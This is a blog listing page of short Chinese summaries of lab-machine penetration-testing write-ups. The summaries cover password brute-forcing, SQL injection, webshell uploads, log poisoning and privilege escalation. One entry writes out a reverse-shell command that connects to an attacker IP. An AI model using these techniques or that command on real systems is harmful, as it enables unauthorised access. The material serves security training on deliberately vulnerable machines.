自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(30)
  • 收藏
  • 关注

原创 DC-4靶机

sudo -l ,teehee是个小众的linux编辑器。如果有sudo权限。有charles密码就是^xHhA&hvim0y 切换到charles。jim目录下有密码字典 将字典下载下来 使用hydra进行爆破。sudo -l 但是不知道密码。说有一封信在/var/mail。使用python3提升交互性。使用hydra进行爆破密码。查看/etc/passwd。查看靶机的mac地址。使用kail扫描ip。使用burp进行抓包。

2024-08-15 09:02:16 415

原创 sp eric靶机

访问 /upload/php-reverse-shell.php,成功反弹 shell。输入ls -la命令,发现backup.sh文件可写可执行。查看 backup.sh文件内容,可能是计划任务,看一眼。,发现登录框界面,尝试sql注入,弱口令等,没有结果。使用 python 提升交互性,发现没有python。最后在 /root 下发现一个 flag.txt。,那么用 python3 执行。查看下载的源码,发现账号密码。看看 .git ,使用。尝试登录,发现登录成功。发现存在文件上传功能,

2024-08-14 08:59:24 441

原创 Broken靶机

发现是一段留言,把上面的一些可能作为账号密码的字符拿下来 做一个简单的字典进行爆破。将内容写入到readme.md中 使用xxd转换。发现timedatectl可以执行root权限。访问readme.md 发现是十六进制的值。查看文件,发现文件头为JFIF。发现账号密码都是broken。将后缀改为jpg,查看图片。使用kail进行扫描ip。探测靶机主机,端口,服务。使用hydra进行爆破。查看靶机的mac地址。

2024-08-13 19:54:16 418

原创 DerpNStink靶机

拼接/php/phpmyadmin/ 一个mysql管理界面,不知道版本,只能口令爆破一下,用了root root’ or 1=1#常见的账号密码都不行,就暂时放一下。提示可以在靶机下运行derpy文件,但是实际上靶机上不存在该目录和文件,这里我们创建个相同目录,然后创建文件,随意写入代码;先访问页面,查看网页源代码,获得第一个flag,并获得提示,在hosts配置DNS。在ssh目录下找了key文件(目录隐藏的比较深),通过ftp下载key.txt文件到本地;没什么发现了,用dirb扫描一下目录。

2024-08-12 20:23:01 1543

原创 Lazysysadmin靶机

1.逐个拼接扫描到的目录,/robots.txt -> 逐个拼接/robots.txt的内容 ->【无用】1.已知用户可能为【togie】用hydra,爆破ssh密码 -> 账号密码【togie:12345】2.拼接/phpmyadmin/ -> 尝试万能密码绕过和弱密码爆破 -> 【无果】3.拼接/wordpress,查看页面信息?用户名是togie吗?老规矩,查看用户权限 -> 显示all ->尝试直接提权 ->成功。2.尝试连接ssh,

2024-08-12 20:20:39 444

原创 West-Wild-v1.1靶机

这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功。80端口没发现,从139和445这两个smb服务入手,枚举用户、查找共享文件夹。查看当前目录下文件,看到一个 flag.txt ,下载下来查看。base64解码,得到 flag 1 ,以及一个账号密码。显示为 all ,直接 sudo su 提权,提权成功。查看当前权限,suid、sudo等都没有可利用的。查看文件内容,得到 aveng 用户的密码。端口开放了,22、80、139、445。目录扫描,没什么信息。

2024-08-12 09:17:51 475

原创 unknowndevice64: 1靶机

信息收集靶机IP扫描端口扫描,开放1337-ssh端口服务,31337-http端口服务;进行页面访问查看源码,发现隐藏目录:Key_is_hidd3n.jpg访问这张图片下载图片到本地,可使用kali中的工具steghid(开源隐写程序)提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具,或者在线解密后即可获取到ssh的用户名和密码;得到账号密码:ud64:1M!

2024-08-12 09:17:20 403

原创 DC-2靶机

发现登录上了,进行权限查看,发现有rbash限制。有一些命令不能使用,发现echo命令export命令可以使用,我们使用echo命令查看一下系统命令还有啥能用。flag3提示我们su,我感觉是要我们切换到另一个用户,在tom用户下切换到jerry用户,并查询一下用户下所有相关flag的文件。发现less,ls,scp,vi命令还是可以使用的,查找如何将rbash限制进行绕过,可以使用一下命令进行绕过。发现已经绕过入了,发现了第三个flag,查看一下flag3.txt。使⽤wpscan⼯具枚举⽤户。

2024-08-12 09:16:45 302

原创 Matrix:1靶机

信息收集靶机扫描端口扫描,开放端口22、80、31337目录扫描网址访问进行源码查看,没有发现什么有用的信息拼接目录扫描出的目录/assets根据端口扫描结果还有一个http服务端口,网址访问31337端口进行源码查看,有base64的编码在线解码翻译一下,是echo一段短句进入了Cypher.matrix文件尝试访问Cypher.matrix网页,发现存在一个.bak文件,我们直接下载,用记事本打开后发现为BF编码利用在线网站(Brainfuck/Ook! Obfuscation/Enc

2024-08-12 09:16:11 340

原创 DC-6靶机

靶机扫描。

2024-08-12 09:15:37 304

原创 ZICO2靶机

更具提示,创建一个新库,并在新库中新建一个表,在标的字段写入一句话木马。yijian连接,用view.php包含数据库文件。靶机开放了ssh,用这两个用户连接一下,都连不上。环境配置,将kali设置为2网段的仅主机模式。看看phpliteadmin有没有历史漏洞。type选择text,默认值插入一句话木马。dbadmin看上去像个数据库接口。view.php存在文件包含。在数据库中发现账号密码。主机发现目录端口扫描。

2024-08-08 20:01:42 176

原创 basic_pentesting_2靶机

查看用户家目录下,在kay目录下发现pass.bak和ssh公私钥文件。在.ssh文件目录下发现ssh的公钥和私钥文件普通用户也可以查看。在kail中创建一个文件,给他一个权限,将私钥复制进去。使用john进行解密 得到密码 beeswax。发现密码不对 查看之前的pss.bck文件、发现一个development 拼接访问。大致意思是j用户是弱密码 可以尝试爆破。查看pass.bak文件 发现没有权限。输入 sudo -l 发现没有权限。使用这个当作密码进行sudo -l。发现了两个txt 进行访问。

2024-08-08 19:27:55 450

原创 EvilScience VM靶机

网络发现开放着22,80端口在浏览器中打开 IP 地址目录扫描,发现该网站存在这么一个url,疑似存在LFI(本地文件包含)漏洞;对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破标记之后,加入文件包含可能存在的文件的字典利用ssh登录产生错误日志写入一句话木马访问执行命令。

2024-08-08 10:24:16 376

原创 DerpNStink靶机

拼接/php/phpmyadmin/ 一个mysql管理界面,不知道版本,只能口令爆破一下,用了root root’ or 1=1#常见的账号密码都不行,就暂时放一下。提示可以在靶机下运行derpy文件,但是实际上靶机上不存在该目录和文件,这里我们创建个相同目录,然后创建文件,随意写入代码;先访问页面,查看网页源代码,获得第一个flag,并获得提示,在hosts配置DNS。在ssh目录下找了key文件(目录隐藏的比较深),通过ftp下载key.txt文件到本地;没什么发现了,用dirb扫描一下目录。

2024-08-08 10:23:44 285

原创 Bob_v1.0.1靶机

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh。在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret。再看看 elliot 的家目录,发现一个theadminisdumb.txt 文件。返回 DOcuments目录下,解密 login.txt.gpg ,没有权限。访问.bak 会下载下来 查看 发现过滤的命令。kail上进行监听4444端口。

2024-08-07 19:16:33 401

原创 w1r3s-editable靶机

"和"we have a lot of work to do, stop playing around", 整段意思是"我不认为这是得到root权限的一种方式, 我们有很多工作要去做, 停止在这里乱搞", 简单来说此处啥都搞不了, 要从其他地方入手。解密后的内容为"lt is easy, but not that easy", 意思是"这是简单的, 但不是那个简单", 字面意思有点模拟两可, 属于无效信息。浏览器访问:, 没有回显, 此处用的是Get请求, 后面尝试下POST请求。

2024-08-06 19:33:30 433

原创 W34KN3SS靶机

我们已经 在我们的系统上下载了该文件,并将其移动到代码中。pyc,因为它是一个 python 编译文件,而在线 python-decompiler 只接受 .pyc 格式的输入。我们在端口 443 下的 nmap 结果中找到了名称 weakness.jth。当我们检查代码的文件类型时,它发现是一个 python 编译的文件。需要去下载里面给的一个github的压缩包的工具。,这样我们就可以在我们的系统上下载此文件。的线索 并且我们发现的公钥也是由他生成的。在对域名进行目录扫描。在看之前的另一个文件。

2024-08-06 14:45:15 548

原创 wakanda-1靶机

还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py。在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限。ssh连接 mamadou : Niamey4Ever227!拼接参数存在php伪协议的文件包含,包含首页文件inde.php。将.antivirus.py文件修改为反弹shell的代码。这是一个python环境,家目录下有个flag文件。主机发现,注意找mac地址对应的ip。

2024-08-06 14:44:43 1757

原创 DC-9靶机

发现有file does not exist 可能存在文件包含。用户名admin密码transorbital1 登录。成功读取到 发现礼包包含有users数据库中的用户名。将users数据库中的用户名和密码保存下来进行爆破。在页面中的search界面 有搜索框。得到一个md5加密的密码 解密一下。查询users数据库中的信息。需要进行敲门开启ssh服务。使用hydra工具进行爆破。首先扫描靶机的mac地址。获取staff数据库信息。得到一个账户 进行登录。

2024-08-04 23:36:59 144

原创 devgurur靶机

在config文件中的database.php文件中发现mysql账号和密码。在CMS的home下有个模板。把用户添加到id=1的组中。在里面写反弹shell语句。目录扫描8585端口。

2024-08-04 23:36:28 217

原创 pre靶机

使用之前的config.php.bak账号密码。对域名进行目录扫描 还是没有有用的信息。写入反弹shell语句 vps进行监听。获取config.php.bak文件。将ip和域名放到hosts文件中。访问 cookie值是文件名。将子域名放到hosts文件。他的邮箱可能是他的域名。

2024-08-04 23:36:00 114

原创 DepthB2R靶机

关闭防火墙,并反弹shell,ssh bill@localhost bash -i >& /dev/tcp/192.168.81.129/9999 0>&1,kali开启监听。访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令。尝试sudo提权,sudo -l查看支持的sudo命令,sudo su ,提权成功。ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙。尝试弱口令登录时,发现了一组账号密码,但并没有登录成功。主机发现,端口目录扫描。

2024-08-04 18:40:30 209

原创 Dina-1-0-1靶机

账号touhid密码dinan,发现是playsms,去msf上搜一下。媒体播放器打不开,用记事本打开看一下,给了一个接口和账号。解压需要密码,freedom,是一个MP3格式的文件。在/nothing的源代码发现 账号密码。/secure/目录下有个压缩包。主机发现,端口目录扫描。发现是普通用户,提权。

2024-08-04 18:39:51 208

原创 Breach靶机

telnet 127.0.0.1 2323,连接一下此端口,有个坐标,搜索发现这个坐标刚好是休斯顿(houston)的坐标。分析源码,问题答案是mine,如果在三秒内没有回答正确,就会杀死进程,那么再尝试登录并在3秒内输入mine,成功登录。由于注册时没有对输入的用户名进行防护,导致将构造的XSS语句存入了数据库,查看个人信息将会触发用户名的XSS语。看着像是http服务,用nmap再扫下端口,又多了个服务,8888端口有个http服务。目录,拼接admin,之前扫出来的admin,admin登录。

2024-08-01 21:21:00 553

原创 FristiLeaks靶机

返回首页,查看页面源代码,出现“We need to clean this up for production. I left some junk in here to make testing easier. --by eezeepz”可能存在用户eezeepz,并发现了base64加密的内容。构造一个图片,命名为phpinfo.php,进行上传,抓包,修改后缀为.php.jpg。看到登录框,利用burp抓包,查看是否存在SQL注入,经检验,不存在。在蚁剑终端下载生成的木马,并赋予执行权限,执行。

2024-08-01 21:05:21 419

原创 Skytower靶机

在john用户处输入sudo -l查看可提权的命令,发现没有。

2024-07-31 19:31:10 423

原创 Kioptrix Level-1.2靶机

下面是 /etc/sudoers 文件的一个片段。编辑文件,以便我们可以无限制地使用 sudo。需要先在C:\windows\system32\drivers\etc\hosts映射ip。更改为 loneferret ALL=(ALL) NOPASSWD: ALL。发现url中可能存在sql注入 使用sqlmap进行测试。查看 CompanyPolicy.README文件。输入 ls 得到congrats.txt文件。使用 ls 查看更多信息 发现两个文件。检查一下sudo文件的内容。

2024-07-30 20:53:35 488

原创 21LTR.com_Scene1_2.120靶机

创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。su切换newuser用户。查看靶机的mac地址。

2024-07-30 20:08:49 676

原创 Holynix靶机

点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。更改文件 /tmp/bash 的所有权,以便从此 root 成为所有者。执行命令 /bin/tar(理想情况下运行 /bin/bash)将现有的 /bin/tar 文件备份到 bin/tar.bak。现在将 /tmp/bash 文件移动到 /bin/tar。点击Message Board,发现留言板,测试xss。将 /bin/bash 文件复制到 /tmp 文件夹。访问192.168.154.146。上传一个php文件,不让上传。

2024-07-29 21:56:36 342

原创 DE-ICE靶机

【代码】DE-ICE靶机。

2024-07-29 21:56:06 297

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除